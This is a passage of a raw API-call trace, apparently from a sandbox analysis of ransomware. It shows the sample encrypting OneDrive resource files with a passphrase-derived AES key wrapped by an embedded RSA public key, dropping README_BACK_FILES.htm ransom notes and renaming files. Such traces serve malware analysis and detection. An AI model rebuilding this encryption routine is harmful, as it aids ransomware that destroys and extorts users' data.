dwFileAttributes=0x0) returned 1 [0271.325] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.327] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.328] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0271.328] CryptDestroyKey (hKey=0x2fa748) returned 1 [0271.328] CryptReleaseContext (hProv=0x2f28a08, dwFlags=0x0) returned 1 [0271.328] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.328] FindClose (in: hFindFile=0x2fa208 | out: hFindFile=0x2fa208) returned 1 [0271.328] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\readme_back_files.htm")) returned 0xffffffff [0271.328] AreFileApisANSI () returned 1 [0271.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0271.328] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.329] GetFileType (hFile=0x5d48) returned 0x1 [0271.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.331] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.331] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0271.331] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.331] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.331] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.331] GetLastError () returned 0x0 [0271.331] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.332] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.332] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.334] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ja\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.334] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.335] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27e58) returned 1 [0271.337] CryptCreateHash (in: hProv=0x2f27e58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.337] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.337] CryptHashData (hHash=0x2fa748, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.337] CryptDeriveKey (in: hProv=0x2f27e58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa4c8) returned 1 [0271.337] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.337] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.337] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28188) returned 1 [0271.337] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28188, dwCertEncodingType=0x1, pInfo=0x2f31b40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f31b70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f31b78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fabc8) returned 1 [0271.337] CryptEncrypt (in: hKey=0x2fabc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.338] CryptEncrypt (in: hKey=0x2fabc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28210*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28210*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.338] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28210*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28210*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.338] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.343] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.344] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.358] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.358] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.358] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.358] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.359] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.359] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.359] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.359] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.359] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.359] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.360] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.360] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.360] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.360] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.360] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.360] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.362] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.362] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.362] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.363] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.363] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.363] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.363] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.363] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.363] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.364] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.364] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.364] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.364] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.364] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, 